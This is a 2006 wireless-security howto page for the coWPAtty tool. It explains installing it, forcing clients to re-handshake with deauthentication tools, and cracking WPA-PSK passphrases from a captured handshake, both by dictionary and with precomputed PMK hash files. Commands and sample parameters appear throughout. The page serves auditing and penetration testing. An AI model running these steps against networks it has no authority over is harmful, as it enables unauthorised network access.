Linux

 

Linux tools, Howtos

 

Tools Index

 

Wireless Commands

 

FC6 Build Howto

 

FC5 Build Howto

 

FC4 Build Howto

 

Live Linux Distros

 

 

Site Search

 

 

 

 

Windows

 

WIN32 tools, Howtos

 

Tools Index

 

 

Get Firefox!

 

 

General

 

Miscellaneous WI-FI

 

Default WI-FI Settings

 

Rogue AP Howtos

 

WI-FI Certifications

 

802.11 Standards

 

STEP BY STEP Guides

 

Formats / Extensions

 

WI-FI Home Security

 

Useful Links

 

 

 

 

UPDATE August 2006: coWPAtty 4.0 is now available from the churchofwifi (includes WPA2 cracking capabilities)

 

coWPAtty MAIN:

 

"coWPAtty is designed to audit the pre-shared key (PSK) selection for WPA networks based on the TKIP protocol." - Joshua Wright.

Project Homepage: http://www.churchofwifi.org/

 

Local Mirror: cowpatty-3.0.tgz  MD5: 9f050eda4f41b003bc37cd0813035441

 

Installing coWPAtty

 

coWPAtty Dictionary Attack

 

Precomputing WPA PMK to crack WPA PSK

 

coWPAtty Precomputed WPA Attack

 

 

Installing coWPAtty:

 

Download the latest coWPAtty (currently coWPAtty-3.0) to /tools/wifi

 

tar zxvf cowpatty-3.0.tgz

 

cd cowpatty-3.0

 

make

 

 

coWPAtty Dictionary Attack:

 

To perform the coWPAtty dictionary attack we need to supply the tool with a capture file that includes the TKIP four-way handshake, a dictionary file of passphrases to guess with and the SSID for the network.

 

In order to collect the four-way handshake you can either wait until a client joins the network or preferably you can force it to rejoin the network using tools like void11 or aireplay and capture the handshakes using something like kismet, ethereal or airodump.

 

./cowpatty -r  wpa-test-01.cap -f dict -s cuckoo

 

 

 

 

As you can see this dictionary attack took in excess of 3 minutes, we can speed up this process by precomputing the WPA-PMK to crack the WPA-PSK (see below).

 

wpa-test-01.cap is the capture containing the four-way handshake

 

dict is the password file

 

cuckoo is the network SSID

 

 

Precomputing WPA PMK to crack WPA PSK:

 

genpmk is used to precompute the hash files in a similar way to Rainbow tables is used to pre-hash passwords in Windows LANMan attacks.  There is a slight difference however in WPA in that the SSID of the network is used as well as the WPA-PSK to "salt" the hash.  This means that we need a different set of hashes for each and every unique SSID i.e. a set for "linksys" a set for "tsunami" etc..

 

 

So to generate some hash files for a network using the SSID cuckoo we use:

 

 

./genpmk  -f  dict  -d hashfile  -s cuckoo 

 

 

dict is the password file

 

hashfile is our output file

 

cuckoo is the network SSID

 

 

coWPAtty Precomputed WPA Attack:

 

Now we have created our hash file we can use it against any WPA-PSK network that is utilising a network SSID of cuckoo.  Remember the capture (wpa-test-01.cap) must contain the four-way handshake to be successful.

 

 

./cowpatty  -r  wpa-test-01.cap  -d  hashfile  -s cuckoo 

 

 

 

 

wpa-test-01.cap is the capture containing the four-way handshake

hashfile is our precomputed hashes

cuckoo is the network SSID

 

 

Notice that cracking the WPA-PSK took 0.21 seconds with the pre-computed attacked as opposed to 200 seconds with standard dictionary attack mode, albeit you do need to pre-compute the hash files prior to the attack.  However, precomputing large hash files for common SSIDS (e.g. linksys, tsunami) would be a sensible move for most penetration testers.

 

 

The Church of Wifi have produced some lookup tables for 1000 SSID's computed against a 170,000 word password file.  The resultant table are approximately 7 Gigabytes in size and can be downloaded via Torrent or direct link:

 

http://www.churchofwifi.org/default.asp?PageLink=Project_Display.asp?PID=87

 

 

UPDATE August 2006: coWPAtty 4.0 is now available from the churchofwifi (includes WPA2 cracking capabilities)

  
 
  © Copyright 2005-2006 Wirelessdefence.org. All Rights Reserved.